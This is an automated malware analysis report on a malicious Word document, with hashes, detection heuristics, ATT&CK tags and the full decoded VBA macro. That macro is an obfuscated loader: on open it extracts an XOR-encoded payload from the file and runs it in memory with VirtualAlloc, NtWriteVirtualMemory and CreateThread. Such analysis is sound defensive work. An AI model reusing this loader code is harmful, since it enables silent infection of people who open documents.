Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18c1d003c006abe4…

MALICIOUS

Office (OLE)

157.0 KB Created: 2017-07-27 12:14:00 Authoring application: Microsoft Office Word First seen: 2017-08-08
MD5: f4e965a9f4fdf7669b4bd38793dd64cb SHA-1: ef06a3c2ebe6f75d13c2ff1acc12210504f1f7cc SHA-256: 18c1d003c006abe42f93cca747a2028b237ac6378b1f09588ca919523914fa27
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initiating malicious activity upon opening. The heuristics indicate the use of VirtualAlloc and a detected downloader payload (ClamAV: Doc.Downloader.Powload-6809817-0). The VBA script itself uses obfuscation and API calls like VirtualAlloc and CreateThread, strongly suggesting it's designed to download and execute a second-stage payload. The embedded URL is benign, but the presence of the macros and the downloader heuristic are high-confidence indicators of malicious intent.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        qUqxNxac
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4686 bytes
SHA-256: b14cf59c8229219b61f2ac2b69ba8644dd2036f3057c8fa6a9a440af9b7a2737
Detection
ClamAV: No threats found
Obfuscation or payload: likely
36 of 70 identifiers look randomly generated (e.g. 'smCYlvGWifCVPMBfpadWNXgCnUAmdslPJKJwYLqv') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function nPfFLtTDiuzEMPUqevgsnHJUx Lib "kernel32" Alias "CreateThread" (ByVal XPMYkMlBQmCQexBetYuyjhg As Long, ByVal CrVJfAHHhKQnjJlTBkA As Long, ByVal WKlUdapyUPDQJhwSQBvpEUJuH As LongPtr, VKNAWZHpISg As Long, ByVal GekjN As Long, gaEbmtcaOkmca As Long) As LongPtr
Private Declare PtrSafe Function yWlxdGRpNQZFxt Lib "kernel32" Alias "VirtualAlloc" (ByVal iEQRs As Long, ByVal YcSpKiIwIMKIHysNEaQATyqTXlV As LongPtr, ByVal jdMJnGn As Long, ByVal pvXNSEjfJSoAIvZQ As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal RbzLZ As LongPtr, ByVal ymCmFabualVxj As LongPtr, ByVal cHookj As String, ByVal WvxOdVH As LongPtr, ByRef FNLqdyAqsEfIxoo As LongPtr) As LongPtr
#Else
Private Declare Function nPfFLtTDiuzEMPUqevgsnHJUx Lib "kernel32" Alias "CreateThread"  (ByVal XPMYkMlBQmCQexBetYuyjhg As Long, ByVal CrVJfAHHhKQnjJlTBkA As Long, ByVal WKlUdapyUPDQJhwSQBvpEUJuH As Long, VKNAWZHpISg As Long, ByVal GekjN As Long, gaEbmtcaOkmca As Long) As Long
Private Declare Function yWlxdGRpNQZFxt Lib "kernel32" Alias "VirtualAlloc" (ByVal iEQRs As Long, ByVal YcSpKiIwIMKIHysNEaQATyqTXlV As Long, ByVal jdMJnGn As Long, ByVal pvXNSEjfJSoAIvZQ As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal RbzLZ As Long, ByVal ymCmFabualVxj As Long, ByVal cHookj As String, ByVal WvxOdVH As Long, ByRef FNLqdyAqsEfIxoo As Long) As Long
#End If

Const VnlEZxBcfZqAL = &H1000
Const zzYrQiiHPeJ = &H40

Public Sub qUqxNxac()
    Dim QqiyySIVaRefuPVTpKOke() As Byte

    QqiyySIVaRefuPVTpKOke = isvLEnYvmXtVb(ActiveDocument.FullName)
    Dim lplDNKUOVEnqGsQJgbrWnLvb As String
    lplDNKUOVEnqGsQJgbrWnLvb = StrConv(QqiyySIVaRefuPVTpKOke, 64)
    
    Dim fuExNmREcfSnUeXblVzSdiCdGDNT
    fuExNmREcfSnUeXblVzSdiCdGDNT = Split(lplDNKUOVEnqGsQJgbrWnLvb, "smCYlvGWifCVPMBfpadWNXgCnUAmdslPJKJwYLqvLIpgPfjTGgBoygNvgaLqVtTQUMmedehEJHleIZMhKHGXQWrDXoqXaZArOymdTeQBZXEQUIMgoDFnNWaXvIhPNjEKhUpkMJnGReXSsB")

    Dim AzUjGIpq As String
    Dim fkrPzlzIZaNM As String
    Dim PzZSwodHasYBLlge As String
    fkrPzlzIZaNM = StrConv(StrConv(fuExNmREcfSnUeXblVzSdiCdGDNT(UBound(fuExNmREcfSnUeXblVzSdiCdGDNT)), 64), 128)
    PzZSwodHasYBLlge = Mid$(fkrPzlzIZaNM, 3, Len(fkrPzlzIZaNM))

    AzUjGIpq = NBsCwGSJzlcXYdzJlUvNpZc("oBkJwtmDSxpIkXbOPtUIasB", PzZSwodHasYBLlge)
    
    #If VBA7 Then
        Dim eUzDuPolgORdPPppmoiKRVpILb As LongPtr
        Dim qjnyhUgsHCBFBlziLHVBbSSuAVZ As LongPtr
    #Else
        Dim eUzDuPolgORdPPppmoiKRVpILb As Long
        Dim qjnyhUgsHCBFBlziLHVBbSSuAVZ As Long
    #End If

    eUzDuPolgORdPPppmoiKRVpILb = yWlxdGRpNQZFxt(0, Len(AzUjGIpq), VnlEZxBcfZqAL, zzYrQiiHPeJ)
    qjnyhUgsHCBFBlziLHVBbSSuAVZ = NtWriteVirtualMemory(-1, eUzDuPolgORdPPppmoiKRVpILb, AzUjGIpq, Len(AzUjGIpq), 0)
    qjnyhUgsHCBFBlziLHVBbSSuAVZ = nPfFLtTDiuzEMPUqevgsnHJUx(0, 0, eUzDuPolgORdPPppmoiKRVpILb, 0, 0, 0)
End Sub

Public Function isvLEnYvmXtVb(ByVal VjTWSBRjzYxBFXdnvIKUMhwrE As String) As Byte()
    Dim fkrPzlzIZaNM As Long
    Dim PzZSwodHasYBLlge() As Byte
    fkrPzlzIZaNM = FreeFile
    If LenB(Dir(VjTWSBRjzYxBFXdnvIKUMhwrE)) Then
        Open VjTWSBRjzYxBFXdnvIKUMhwrE For Binary Access Read As fkrPzlzIZaNM
        ReDim PzZSwodHasYBLlge(LOF(fkrPzlzIZaNM) - 1&) As Byte
        Get fkrPzlzIZaNM, , PzZSwodHasYBLlge
        Close fkrPzlzIZaNM
    Else
        Err.Raise 53
    End If
    isvLEnYvmXtVb = PzZSwodHasYBLlge
    Erase PzZSwodHasYBLlge
End Function

Public Sub Document_Open()
    qUqxNxac
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function NBsCwGSJzlcXYdzJlUvNpZc(IeStoOasElnmuVtSg As String, XdbKbpySz As String) As String
    Dim LqyNyRTrOzvLl As Long
    Dim sNQnoqBDGfcZzYdDUvoJHn As String
    Dim zNDbcdHOmRrroykDjPiKtKy As Integer, DRkBHHmfxfRVHDGg As Integer, a As Long

    For LqyNyRTrOzvLl = 1 To Len(XdbKbpySz)
        a = LqyNyRTrOzvLl Mod Len(IeStoOasElnmuVtSg)
        If a = 0 Then a = Len(IeStoOasElnmuVtSg)
        
        zNDbcdHOmRrroykDjPiKtKy = Asc(Mid$(XdbKbpySz, LqyNyRTrOzvLl, 1))
        DRkBHHmfxfRVHDGg = Asc(Mid$(IeStoOasElnmuVtSg, a, 1))
        sNQnoqBDGfcZzYdDUvoJHn = sNQnoqBDGfcZzYdDUvoJHn + Chr(zNDbcdHOmRrroykDjPiKtKy Xor DRkBHHmfxfRVHDGg)
    Next LqyNyRTrOzvLl
    
   NBsCwGSJzlcXYdzJlUvNpZc = sNQnoqBDGfcZzYdDUvoJHn
End Function